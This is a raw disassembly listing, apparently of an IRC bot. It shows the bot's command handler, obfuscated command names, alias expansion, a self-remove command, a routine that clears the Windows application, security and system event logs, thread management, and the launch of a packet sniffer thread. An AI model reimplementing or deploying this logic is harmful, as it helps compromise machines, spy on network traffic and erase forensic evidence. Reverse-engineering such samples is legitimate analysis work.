push dword ptr [eax+0Ch]
jmp short loc_403C3A
; ---------------------------------------------------------------------------
loc_403C38: ; CODE XREF: sub_403B2C+105�j
push dword ptr [eax]
loc_403C3A: ; CODE XREF: sub_403B2C+10A�j
call sub_40281E
jmp loc_40ADAB
; ---------------------------------------------------------------------------
loc_403C44: ; CODE XREF: sub_403B2C+F4�j
push dword ptr [esi]
push offset aWyf3k1fthkz_ ; "WyF3K1fTHKz."
call ebx ; dword_42F070
test eax, eax
jnz short loc_403C5D
push offset aDriveList ; "Drive list"
push 7
jmp loc_403B8B
; ---------------------------------------------------------------------------
loc_403C5D: ; CODE XREF: sub_403B2C+123�j
push dword ptr [esi]
push offset a7tmte_meccn ; "7Tmte.MEccn/"
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aWn7_tNza2v ; "wN7.t/nZA2V/"
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aGkyv90skypy ; "gkYv90Skypy/"
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aX2yn5_2imz1 ; "X2yN5/.2ImZ1"
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aNPbw1sdkiw_ ; "N/pbW1sDKiw."
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aFdxpb0leh21_ ; "fDxPB0lEh21."
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aUts3o_rfmks_ ; "uts3o.RfmkS."
call ebx ; dword_42F070
test eax, eax
jz loc_403D6B
push dword ptr [esi]
push offset aBpyvp_fw0vy1 ; "bPYVP.Fw0vY1"
call ebx ; dword_42F070
test eax, eax
jz short loc_403D6B
push dword ptr [esi]
push offset aQxqog1goyq80 ; "QXqOg1gOYq80"
call ebx ; dword_42F070
test eax, eax
jz short loc_403D6B
push dword ptr [esi]
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
call ebx ; dword_42F070
test eax, eax
jnz short loc_403D13
push offset aDownload ; "Download"
jmp short loc_403D25
; ---------------------------------------------------------------------------
loc_403D13: ; CODE XREF: sub_403B2C+1DE�j
push dword ptr [esi]
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_403D2C
push offset aUpdate ; "Update"
loc_403D25: ; CODE XREF: sub_403B2C+1E5�j
push 0Ch
jmp loc_403B8B
; ---------------------------------------------------------------------------
loc_403D2C: ; CODE XREF: sub_403B2C+1F2�j
push dword ptr [esi]
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
call ebx ; dword_42F070
test eax, eax
jz short loc_403D5F
push dword ptr [esi]
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
call ebx ; dword_42F070
test eax, eax
jz short loc_403D5F
push dword ptr [esi]
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_403D83
push offset dword_435C14
push 0Dh
jmp loc_403B8B
; ---------------------------------------------------------------------------
loc_403D5F: ; CODE XREF: sub_403B2C+20B�j
; sub_403B2C+218�j
push offset off_435C10
push 0Ah
jmp loc_403B8B
; ---------------------------------------------------------------------------
loc_403D6B: ; CODE XREF: sub_403B2C+95�j
; sub_403B2C+13C�j ...
push offset aStopped_ ; "Stopped."
push 8
jmp loc_403B8B
; ---------------------------------------------------------------------------
loc_403D77: ; CODE XREF: sub_403B2C+D2�j
; sub_403B2C+E3�j
push offset aSecure ; "Secure"
push 2
jmp loc_403B8B
; ---------------------------------------------------------------------------
loc_403D83: ; CODE XREF: sub_403B2C+45�j
; sub_403B2C+225�j
push offset aC7rq4Xpvel_ ; "c7RQ4/xPvel."
push dword ptr [esi]
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_403DC2
cmp [ebp+arg_20], eax
mov edi, [ebp+arg_C]
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
mov esi, offset aS_6 ; "[%s] ~"
jz loc_407742
cmp [ebp+arg_18], eax
jnz loc_40AD9F
cmp [ebp+arg_14], eax
jnz loc_40AF54
jmp loc_407732
; ---------------------------------------------------------------------------
loc_403DC2: ; CODE XREF: sub_403B2C+267�j
push dword ptr [esi]
push offset a_hioo_5pweu_ ; ".HiOo.5pwEU."
call ebx ; dword_42F070
test eax, eax
jnz loc_403F13
push 20h
push [ebp+arg_8]
call sub_4233B0
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
jz loc_40AF54
mov ebx, 1000h
xor edi, edi
push ebx
lea eax, [ebp+var_8CAC]
push edi
push eax
inc esi
mov [ebp+arg_4], edi
call sub_4221F0
push esi
call sub_422120
add esp, 10h
mov [ebp+arg_0], eax
push edi
push edi
push esi
call sub_422120
pop ecx
push eax
push esi
call sub_41CEE1
push offset aH08_Drzwx_ ; "h/08./drzWX."
lea eax, [ebp+var_8CAC]
push offset aSCipherText ; "%s (Cipher text): \""
push eax
call sub_422063
add esp, 1Ch
cmp [ebp+arg_0], edi
mov [ebp+arg_8], edi
mov edi, [ebp+arg_C]
jbe loc_403ED6
loc_403E46: ; CODE XREF: sub_403B2C+3A4�j
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+esi]
push eax
push offset aX2_2x ; "\\x%2.2X"
lea eax, [ebp+var_150]
push 0Ch
push eax
call sub_42219B
lea eax, [ebp+var_150]
push eax
call sub_422120
add [ebp+arg_4], eax
add esp, 14h
cmp [ebp+arg_4], 0FECh
jb short loc_403EA4
lea eax, [ebp+var_8CAC]
push eax
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
push ebx
lea eax, [ebp+var_8CAC]
push 0
push eax
call sub_4221F0
add esp, 18h
and [ebp+arg_4], 0
loc_403EA4: ; CODE XREF: sub_403B2C+34E�j
lea eax, [ebp+var_150]
push eax
call sub_422120
push eax
lea eax, [ebp+var_150]
push eax
lea eax, [ebp+var_8CAC]
push eax
call sub_421F40
add esp, 10h
inc [ebp+arg_8]
mov eax, [ebp+arg_8]
cmp eax, [ebp+arg_0]
jb loc_403E46
loc_403ED6: ; CODE XREF: sub_403B2C+314�j
lea eax, [ebp+var_8CAC]
push offset asc_435BDC ; "\";"
push eax
call sub_423270
lea eax, [ebp+var_8CAC]
push eax
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
push 0
push 0
push esi
call sub_422120
pop ecx
push eax
push esi
call sub_41CEE1
jmp loc_40ADAB
; ---------------------------------------------------------------------------
loc_403F13: ; CODE XREF: sub_403B2C+2A1�j
push dword ptr [esi]
push offset aDj9owUmrbd_ ; "dJ9OW/uMRBD."
call ebx ; dword_42F070
test eax, eax
jnz loc_404014
mov esi, [esi+4]
cmp esi, edi
jnz short loc_403F77
mov ecx, dword_45539C
mov edx, offset aSsl ; " (SSL)"
mov eax, ecx
imul eax, 0B8h
cmp dword_43970C[eax], edi
jnz short loc_403F4B
mov edx, offset byte_44D6A4
loc_403F4B: ; CODE XREF: sub_403B2C+418�j
push edx
push dword_439708[eax]
lea eax, dword_439658[eax]
push eax
mov eax, [ebp+arg_C]
push ecx
push offset aH08_Drzwx_ ; "h/08./drzWX."
push offset aSCurrentServer ; "%s: [Current Server]: [%i:%s:%d%s]"
push dword ptr [eax+0Ch]
loc_403F6A: ; CODE XREF: sub_403B2C+4B5F�j
push [ebp+arg_10]
call sub_4104F6
jmp loc_40A16B
; ---------------------------------------------------------------------------
loc_403F77: ; CODE XREF: sub_403B2C+3FD�j
push esi
push offset aPlsymAee6v1 ; "PlsYM/aEe6v1"
call ebx ; dword_42F070
test eax, eax
jnz loc_40AF54
mov edi, [ebp+arg_C]
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
push ebx
push offset aSServerList ; "%s [Server List]:"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
and [ebp+arg_C], 0
add esp, 10h
cmp dword_43C170, 0
jle short loc_403FFE
mov esi, offset dword_439708
loc_403FB5: ; CODE XREF: sub_403B2C+4D0�j
cmp dword ptr [esi+4], 0
mov eax, offset aSsl ; " (SSL)"
jnz short loc_403FC5
mov eax, offset byte_44D6A4
loc_403FC5: ; CODE XREF: sub_403B2C+492�j
push offset dword_439638
push eax
push dword ptr [esi]
lea eax, [esi-0B0h]
push eax
push [ebp+arg_C]
push offset aISDSS ; "[%i: %s:%d%s,%s]"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 20h
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
add esi, 0B8h
cmp eax, dword_43C170
jl short loc_403FB5
loc_403FFE: ; CODE XREF: sub_403B2C+482�j
push ebx
push offset aSServersListed ; "%s Servers Listed"
push dword ptr [edi+0Ch]
loc_404007: ; CODE XREF: sub_403B2C+3B65�j
push [ebp+arg_10]
call sub_4104F6
loc_40400F: ; DATA XREF: .text:004362A8�o
jmp loc_40ADAB
; ---------------------------------------------------------------------------
loc_404014: ; CODE XREF: sub_403B2C+3F2�j
push dword ptr [esi]
push offset aL3nyw_d7tfl_ ; "l3nYW.D7Tfl."
call ebx ; dword_42F070
test eax, eax
jnz loc_4040E2
cmp [ebp+arg_14], eax
mov edi, [ebp+arg_C]
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
mov esi, offset aSAliasList ; "%s [Alias list]"
jnz short loc_40404C
cmp [ebp+arg_18], eax
jnz short loc_404052
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_40404C: ; CODE XREF: sub_403B2C+509�j
cmp [ebp+arg_18], 0
jz short loc_404061
loc_404052: ; CODE XREF: sub_403B2C+50E�j
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 10h
loc_404061: ; CODE XREF: sub_403B2C+524�j
xor ebx, ebx
cmp dword_42F318, ebx
jle loc_40AF54
mov esi, offset dword_454750
loc_404074: ; CODE XREF: sub_403B2C+5AF�j
cmp byte ptr [esi], 0
jz short loc_4040CE
lea eax, [esi+18h]
push eax
push esi
push ebx
lea eax, [ebp+var_CCAC]
push offset aD_SS ; "%d. %s = %s"
push eax
call sub_422063
add esp, 14h
cmp [ebp+arg_14], 0
jnz short loc_4040B4
cmp [ebp+arg_18], 0
jnz short loc_4040BA
lea eax, [ebp+var_CCAC]
push eax
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 0Ch
loc_4040B4: ; CODE XREF: sub_403B2C+56B�j
cmp [ebp+arg_18], 0
jz short loc_4040CE
loc_4040BA: ; CODE XREF: sub_403B2C+571�j
lea eax, [ebp+var_CCAC]
push eax
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 0Ch
loc_4040CE: ; CODE XREF: sub_403B2C+54B�j
; sub_403B2C+58C�j
inc ebx
add esi, 0B8h
cmp ebx, dword_42F318
jl short loc_404074
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4040E2: ; CODE XREF: sub_403B2C+4F3�j
push dword ptr [esi]
push offset aP00ls0k4t_n1 ; "P00Ls0K4t.N1"
call ebx ; dword_42F070
test eax, eax
jnz loc_4041C9
cmp [esi+4], edi
jz loc_4041B7
mov eax, [esi+8]
cmp eax, edi
jz loc_4041B7
push eax
lea eax, [ebp+var_37D8]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 3
pop ebx
cmp [ebp+arg_4], ebx
jle short loc_40415E
loc_404124: ; CODE XREF: sub_403B2C+630�j
mov eax, [esi+ebx*4]
cmp eax, edi
jz short loc_404158
push eax
lea eax, [ebp+var_529C]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_529C]
push 104h
push eax
lea eax, [ebp+var_37D8]
push eax
call sub_421F40
add esp, 18h
loc_404158: ; CODE XREF: sub_403B2C+5FD�j
inc ebx
cmp ebx, [ebp+arg_4]
jl short loc_404124
loc_40415E: ; CODE XREF: sub_403B2C+5F6�j
lea eax, [ebp+var_37D8]
push eax
push dword ptr [esi+4]
call sub_412069
cmp [ebp+arg_14], 0
mov edi, [ebp+arg_C]
pop ecx
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
pop ecx
mov esi, offset aSAddedAliasS ; "%s Added Alias: %s"
jnz short loc_40419F
cmp [ebp+arg_18], 0
jnz short loc_4041A9
lea eax, [ebp+var_37D8]
push eax
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_40419F: ; CODE XREF: sub_403B2C+654�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4041A9: ; CODE XREF: sub_403B2C+65A�j
lea eax, [ebp+var_37D8]
loc_4041AF: ; CODE XREF: sub_403B2C+1C46�j
; sub_403B2C+3D8E�j ...
push eax
loc_4041B0: ; CODE XREF: sub_403B2C+9FD�j
push ebx
push esi
jmp loc_40A5C3
; ---------------------------------------------------------------------------
loc_4041B7: ; CODE XREF: sub_403B2C+5CA�j
; sub_403B2C+5D5�j
mov edi, [ebp+arg_C]
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4041C9: ; CODE XREF: sub_403B2C+5C1�j
and [ebp+arg_0], 0
cmp dword_42F318, 0
mov edi, [ebp+arg_C]
jle loc_40430F
mov [ebp+arg_C], offset dword_454768
loc_4041E4: ; CODE XREF: sub_403B2C+7DD�j
mov eax, [ebp+arg_C]
push dword ptr [esi]
add eax, 0FFFFFFE8h
push eax
call ebx ; dword_42F070
test eax, eax
jnz loc_4042F6
movsx eax, byte_439016
push [ebp+arg_C]
push eax
lea eax, [ebp+var_7CAC]
push offset aCS ; "%c%s"
push eax
call sub_422063
mov ecx, [ebp+arg_10]
add esp, 10h
call sub_41111B
push eax
lea eax, [ebp+var_7CAC]
push offset aMe_0 ; "$me"
push eax
call sub_41F167
mov ecx, [ebp+arg_10]
add esp, 0Ch
call sub_41111F
push eax
lea eax, [ebp+var_7CAC]
push offset aUser_1 ; "$user"
push eax
call sub_41F167
push offset dword_439638
lea eax, [ebp+var_7CAC]
push offset aChan ; "$chan"
push eax
call sub_41F167
push dword ptr [esi+4]
lea eax, [ebp+var_7CAC]
push offset a1 ; "$1"
push eax
call sub_41F167
push dword ptr [esi+8]
lea eax, [ebp+var_7CAC]
push offset a2 ; "$2"
push eax
call sub_41F167
push dword ptr [esi+0Ch]
lea eax, [ebp+var_7CAC]
push offset a3 ; "$3"
push eax
call sub_41F167
push dword ptr [esi+10h]
lea eax, [ebp+var_7CAC]
push offset a4 ; "$4"
push eax
call sub_41F167
add esp, 48h
lea eax, [ebp+var_7CAC]
push dword ptr [esi+14h]
push offset a5 ; "$5"
push eax
call sub_41F167
push dword ptr [esi+18h]
lea eax, [ebp+var_7CAC]
push offset a6 ; "$6"
push eax
call sub_41F167
push 0
lea eax, [ebp+var_7CAC]
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push eax
call sub_403A63
add esp, 2Ch
loc_4042F6: ; CODE XREF: sub_403B2C+6C5�j
inc [ebp+arg_0]
add [ebp+arg_C], 0B8h
mov eax, [ebp+arg_0]
cmp eax, dword_42F318
jl loc_4041E4
loc_40430F: ; CODE XREF: sub_403B2C+6AB�j
push dword ptr [esi]
push offset aPdazx1odsoh0 ; "PDazX1oDSOh0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40432C
push dword ptr [edi+0Ch]
mov ecx, [ebp+arg_10]
call sub_40FEC8
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40432C: ; CODE XREF: sub_403B2C+7EE�j
push dword ptr [esi]
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4043AF
mov esi, [esi+4]
xor ebx, ebx
cmp esi, ebx
jz loc_40AF54
push esi
call sub_41CE88
push eax
push offset dword_4395C4
call sub_422760
add esp, 0Ch
test eax, eax
jnz loc_40AF54
push ebx
push ebx
call sub_41F455
cmp [ebp+arg_14], ebx
pop ecx
pop ecx
jnz short loc_404375
push dword ptr [edi+8]
jmp short loc_40437A
; ---------------------------------------------------------------------------
loc_404375: ; CODE XREF: sub_403B2C+842�j
push offset asc_435B04 ; "*"
loc_40437A: ; CODE XREF: sub_403B2C+847�j
push dword ptr [edi+4]
push dword ptr [edi]
push offset aRemoveCmdRecei ; "Remove cmd received: [%s!%s@root]"
push [ebp+arg_10]
call sub_41015C
add esp, 14h
push 1F4h
call dword_42F15C ; Sleep
mov ecx, [ebp+arg_10]
call sub_41012A
call dword_454258 ; WSACleanup
push ebx
call dword_42F06C ; ExitProcess
loc_4043AF: ; CODE XREF: sub_403B2C+80B�j
push dword ptr [esi]
push offset aVsz2xXqjp5 ; "Vsz2x/xqJP5/"
call ebx ; dword_42F070
test eax, eax
jnz loc_4044A6
xor esi, esi
cmp dword_4543E8, esi
jnz loc_404497
mov ebx, 94h
lea eax, [ebp+var_1F10]
push ebx
push esi
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_1F10]
mov [ebp+var_1F10], ebx
push eax
call dword_42F044 ; GetVersionExA
cmp [ebp+var_1F00], 2
mov [ebp+var_15C], offset aApplication ; "application"
mov [ebp+var_158], offset aSecurity ; "security"
mov [ebp+var_154], offset aSystem ; "system"
mov [ebp+arg_C], esi
jnz short loc_404455
xor ebx, ebx
loc_404423: ; CODE XREF: sub_403B2C+927�j
push [ebp+ebx*4+var_15C]
push 0
call dword_454288 ; OpenEventLogA
mov esi, eax
test esi, esi
jz short loc_40444F
push 0
push esi
call dword_454290 ; ClearEventLogA
test eax, eax
jz short loc_404448
inc [ebp+arg_C]
loc_404448: ; CODE XREF: sub_403B2C+917�j
push esi
call dword_45424C ; CloseEventLog
loc_40444F: ; CODE XREF: sub_403B2C+90A�j
inc ebx
cmp ebx, 3
jl short loc_404423
loc_404455: ; CODE XREF: sub_403B2C+8F3�j
xor eax, eax
cmp [ebp+arg_14], eax
jnz loc_40AF54
cmp [ebp+arg_18], eax
jnz loc_40AF54
cmp [ebp+arg_C], eax
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
jle short loc_40448C
push 3
push [ebp+arg_C]
push ebx
push offset aSClearedDDSysl ; "%s Cleared [%d/%d] syslogs"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40448C: ; CODE XREF: sub_403B2C+945�j
push ebx
push offset aSFailedToClear ; "%s Failed to clear syslogs"
jmp loc_40768E
; ---------------------------------------------------------------------------
loc_404497: ; CODE XREF: sub_403B2C+89C�j
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
mov esi, offset aSAdvapi_dllNot ; "%s Advapi.dll not loaded"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_4044A6: ; CODE XREF: sub_403B2C+88E�j
push dword ptr [esi]
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
call ebx ; dword_42F070
test eax, eax
jnz loc_40471C
mov eax, [esi+4]
test eax, eax
jz loc_4045C7
push eax
push offset aE0idd0rdw2u ; "e0idD0RDw2U/"
call ebx ; dword_42F070
test eax, eax
jnz loc_4045C7
mov eax, [esi+8]
test eax, eax
jz loc_40AF54
push eax
push offset a86tb1fspjg0 ; "86tb/1FSpjg0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_404538
call sub_41BFDA
test eax, eax
mov [ebp+arg_C], eax
mov ebx, offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
jle short loc_40452E
cmp [ebp+arg_14], 0
mov esi, offset aSStoppedDThrea ; "%s Stopped: [%d] thread(s)"
jnz short loc_40451C
cmp [ebp+arg_18], 0
jnz short loc_404526
push eax
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_40451C: ; CODE XREF: sub_403B2C+9D7�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_404526: ; CODE XREF: sub_403B2C+9DD�j
push [ebp+arg_C]
jmp loc_4041B0
; ---------------------------------------------------------------------------
loc_40452E: ; CODE XREF: sub_403B2C+9CC�j
mov esi, offset aSNoThreadSFoun ; "%s No thread(s) found"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_404538: ; CODE XREF: sub_403B2C+9BB�j
push dword ptr [esi+8]
call sub_422B5A
push eax
call sub_41BF58
pop ecx
mov ebx, offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
test eax, eax
pop ecx
jz short loc_40458C
cmp [ebp+arg_14], 0
jnz short loc_404574
cmp [ebp+arg_18], 0
jnz short loc_40457E
push dword ptr [esi+8]
push ebx
push offset aSKilledThreadS ; "%s Killed thread: [%s]"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_404574: ; CODE XREF: sub_403B2C+A29�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40457E: ; CODE XREF: sub_403B2C+A2F�j
push dword ptr [esi+8]
push ebx
push offset aSKilledThreadS ; "%s Killed thread: [%s]"
jmp loc_40A5C3
; ---------------------------------------------------------------------------
loc_40458C: ; CODE XREF: sub_403B2C+A23�j
cmp [ebp+arg_14], 0
jnz short loc_4045AF
cmp [ebp+arg_18], 0
jnz short loc_4045B9
push dword ptr [esi+8]
push ebx
push offset aSFailedToKillT ; "%s Failed to kill thread: [%s]"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_4045AF: ; CODE XREF: sub_403B2C+A64�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4045B9: ; CODE XREF: sub_403B2C+A6A�j
push dword ptr [esi+8]
push ebx
push offset aSFailedToKillT ; "%s Failed to kill thread: [%s]"
jmp loc_40A5C3
; ---------------------------------------------------------------------------
loc_4045C7: ; CODE XREF: sub_403B2C+990�j
; sub_403B2C+9A0�j
push 5
call sub_41C254
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_404614
cmp [ebp+arg_14], 0
mov ebx, offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
jnz short loc_404602
cmp [ebp+arg_18], 0
jnz short loc_40460C
push eax
push offset aThreadList_0 ; "Thread list"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_404602: ; CODE XREF: sub_403B2C+AB8�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40460C: ; CODE XREF: sub_403B2C+ABE�j
push [ebp+arg_C]
jmp loc_4046FD
; ---------------------------------------------------------------------------
loc_404614: ; CODE XREF: sub_403B2C+AA8�j
mov eax, [ebp+arg_14]
mov [ebp+var_3620], eax
mov eax, [ebp+arg_20]
mov [ebp+var_3624], eax
mov eax, [ebp+arg_18]
mov [ebp+var_361C], eax
test eax, eax
lea eax, [ebp+var_36D0]
jnz short loc_40463E
push dword ptr [edi+0Ch]
jmp short loc_404640
; ---------------------------------------------------------------------------
loc_40463E: ; CODE XREF: sub_403B2C+B0B�j
push dword ptr [edi]
loc_404640: ; CODE XREF: sub_403B2C+B10�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_36D4], eax
mov esi, [esi+4]
test esi, esi
jz short loc_40466C
push offset aNfknl0nqigy0 ; "NFKNL0nQigY0"
push esi
call ebx ; dword_42F070
neg eax
sbb eax, eax
inc eax
mov [ebp+var_3640], eax
jmp short loc_404673
; ---------------------------------------------------------------------------
loc_40466C: ; CODE XREF: sub_403B2C+B29�j
and [ebp+var_3640], 0
loc_404673: ; CODE XREF: sub_403B2C+B3E�j
mov ebx, offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
push ebx
push offset aSThreadList ; "%s Thread list"
push 5
call sub_41BED7
add esp, 0Ch
mov [ebp+var_3650], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_36D4]
push esi
push eax
push offset sub_41C143
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_3650]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_40470F
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_4046EC
cmp [ebp+arg_18], 0
jnz short loc_4046F6
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aThreadList_0 ; "Thread list"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_4046EC: ; CODE XREF: sub_403B2C+B9C�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4046F6: ; CODE XREF: sub_403B2C+BA2�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
loc_4046FD: ; CODE XREF: sub_403B2C+AE3�j
push offset aThreadList_0 ; "Thread list"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_404707: ; CODE XREF: sub_403B2C+BE9�j
push 32h
call dword_42F15C ; Sleep
loc_40470F: ; CODE XREF: sub_403B2C+B91�j
cmp [ebp+var_3618], esi
jz short loc_404707
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40471C: ; CODE XREF: sub_403B2C+985�j
push dword ptr [esi]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call ebx ; dword_42F070
test eax, eax
jnz loc_40485C
push dword ptr [esi+4]
push offset aDJstMfgyq_ ; "d/Jst/MFgyQ."
call ebx ; dword_42F070
test eax, eax
jnz loc_40485C
push 0Eh
call sub_41C254
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_404791
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aM7pC1xaudb1ty8 ; "m7P/c1xaudB1TY84s/myQpz0"
jnz short loc_40477A
cmp [ebp+arg_18], 0
jnz short loc_404784
push eax
push offset aSniffer_ ; "Sniffer."
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40477A: ; CODE XREF: sub_403B2C+C30�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_404784: ; CODE XREF: sub_403B2C+C36�j
push [ebp+arg_C]
push offset aSniffer_ ; "Sniffer."
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_404791: ; CODE XREF: sub_403B2C+C20�j
cmp [ebp+arg_2C], 0
jz short loc_40479E
mov esi, [esi+8]
test esi, esi
jnz short loc_4047A5
loc_40479E: ; CODE XREF: sub_403B2C+C69�j
push offset dword_439648
jmp short loc_4047A6
; ---------------------------------------------------------------------------
loc_4047A5: ; CODE XREF: sub_403B2C+C70�j
push esi
loc_4047A6: ; CODE XREF: sub_403B2C+C77�j
lea eax, [ebp+var_3C54]
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
mov ebx, offset aM7pC1xaudb1ty8 ; "m7P/c1xaudB1TY84s/myQpz0"
push ebx
push offset aSSniffer_ ; "%s Sniffer."
push 0Eh
mov [ebp+var_3C58], eax
call sub_41BED7
add esp, 0Ch
mov [ebp+var_3BD4], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_3C58]
push esi
push eax
push offset sub_415A65
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_3BD4]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_404817
loc_404808: ; CODE XREF: sub_403B2C+D1D�j
; sub_403B2C+D2E�j ...
xor eax, eax
jmp loc_40AF57
; ---------------------------------------------------------------------------
loc_40480F: ; CODE XREF: sub_403B2C+CF1�j
push 32h
call dword_42F15C ; Sleep
loc_404817: ; CODE XREF: sub_403B2C+CDA�j
cmp [ebp+var_3B9C], esi
jz short loc_40480F
xor eax, eax
mov esi, offset aSStarted_ ; "%s started."
cmp [ebp+arg_14], eax
jnz short loc_404845
cmp [ebp+arg_1C], eax
jnz short loc_404845
cmp [ebp+arg_18], eax
jnz short loc_40484B
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_404845: ; CODE XREF: sub_403B2C+CFD�j
; sub_403B2C+D02�j
cmp [ebp+arg_18], 0
jz short loc_404808
loc_40484B: ; CODE XREF: sub_403B2C+D07�j
push ebx
loc_40484C: ; CODE XREF: sub_403B2C+68CD�j
push esi
loc_40484D: ; CODE XREF: sub_403B2C+66E2�j
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
loc_404857: ; CODE XREF: sub_403B2C+2199�j
add esp, 10h
jmp short loc_404808
; ---------------------------------------------------------------------------
loc_40485C: ; CODE XREF: sub_403B2C+BFB�j
; sub_403B2C+C0D�j
push dword ptr [esi]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_404893
push dword ptr [esi+4]
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_404893
push offset aSniffer ; "Sniffer"
push 0Eh
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_404883: ; CODE XREF: sub_403B2C+6059�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
jmp loc_40A166
; ---------------------------------------------------------------------------
